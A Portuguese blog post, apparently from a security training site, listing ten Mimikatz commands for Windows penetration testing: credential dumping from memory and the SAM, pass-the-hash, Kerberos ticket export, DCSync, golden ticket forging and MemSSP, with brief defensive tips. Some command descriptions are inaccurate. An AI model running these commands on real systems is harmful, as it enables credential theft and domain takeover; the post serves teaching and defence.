No cenário em constante evolução da cibersegurança, as ferramentas e técnicas utilizadas tanto pelos defensores como pelos atacantes estão em constante avanço. Entre a infinidade de ferramentas disponíveis, o Mimikatz se destaca como um utilitário particularmente poderoso e versátil que se tornou um elemento básico nos arsenais tanto de profissionais de segurança quanto de agentes mal-intencionados. Desenvolvido por Benjamin Delpy, o Mimikatz ganhou reputação por sua capacidade de extrair senhas de texto simples, hash, códigos PIN e tickets Kerberos da memória, tornando-o um recurso inestimável para compreender e lidar com roubo de credenciais e escalonamento de privilégios em ambientes Windows.

Dito isso, abaixo separamos para você 10 comandos para testes de  invasão Windows Mimikatz com orientações para cibersegurança, vamos lá!

10 Comandos para Testes de  Invasão Windows Mimikatz

1. privilege::debug

Concede ao processo atual privilégios de depuração,permitindo o acesso a tokens de segurança.

2. sekurlsa::logonpasswords

Extrai senhas de logon em texto plano e hashs de senha do sistema Windows.

3. sekurlsa::pth /user:<usuário> /domain:<domínio> /ntlm:<hash>

Realiza a técnica “Pass-the-Hash”, autenticando-se em um sistema remoto com um hash de senha.

4. sekurlsa::tickets /export

Extrai tickets Kerberos para análise ou uso posterior, incluindo Golden Tickets e Silver Tickets.

5. lsadump::sam

Extrai o banco de dados SAM (Security Account Manager), que armazena informações de conta de usuário e senhas em hashes.

6. lsadump::dcsync /domain:<domínio>

Obtém hashes de senha de contas de usuário do Active Directory usando a função DRSReplicaGetInfo().

7. kerberos::golden /user:<usuário> /domain:<domínio> /sid:<SID>

Gera um Golden Ticket para obter acesso persistente a sistemas Windows.

8. kerberos::ptt <caminho do ticket.kirbi>

Passa um ticket Kerberos forjado para o sistema, permitindo acesso como o usuário especificado no ticket.

9. token::elevate

Eleva o token de segurança atual para o token mais alto disponível, concedendo privilégios administrativos.

10. misc::memssp

Ativa o protocolo de segurança de provedor de serviços de memória (MemSSP) para passar hashes de senha para autenticação.

Orientações gerais

• Divida a rede em segmentos menores e restrinja o tráfego.
• Implemente sistemas de monitoramento de eventos de segurança.
• Estabeleça políticas de senha robustas que exijam senhas longas e complexas
• Limite o acesso aos tokens de segurança
• …e outras medidas.

Confira também: 10 Ferramentas Windows para Cibersegurança

Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre cibersegurança, confira os nossos cursos disponíveis. 

CONFIRA TAMBÉM:

• 
  21.11.2024 | Carreiras em Cibersegurança

  CVE-2024-10230 – Vulnerabilidade em dispositivos com o Google Chrome – Descoberta em 22 de Outubro de 2024

  Esta vulnerabilidade afeta dispositivos com o navegador Google Chrome, versão anterior à 130.0.6723.69, em todas as plataformas que executam esse software, incluindo Windows, Mac e Linux. Trata-se de uma falha de type confusion no motor V8 […]

• 
  21.11.2024 | Carreiras em Cibersegurança

  Segurança da Informação: O que é OWASP Zed Attack Proxy?

  Os atores de ameaças estão se tornando mais inteligentes. E é por isso que os ataques cibernéticos estão se tornando mais cultivados e desenfreados a cada dia que passa. Consequentemente, prestar atenção à segurança da web […]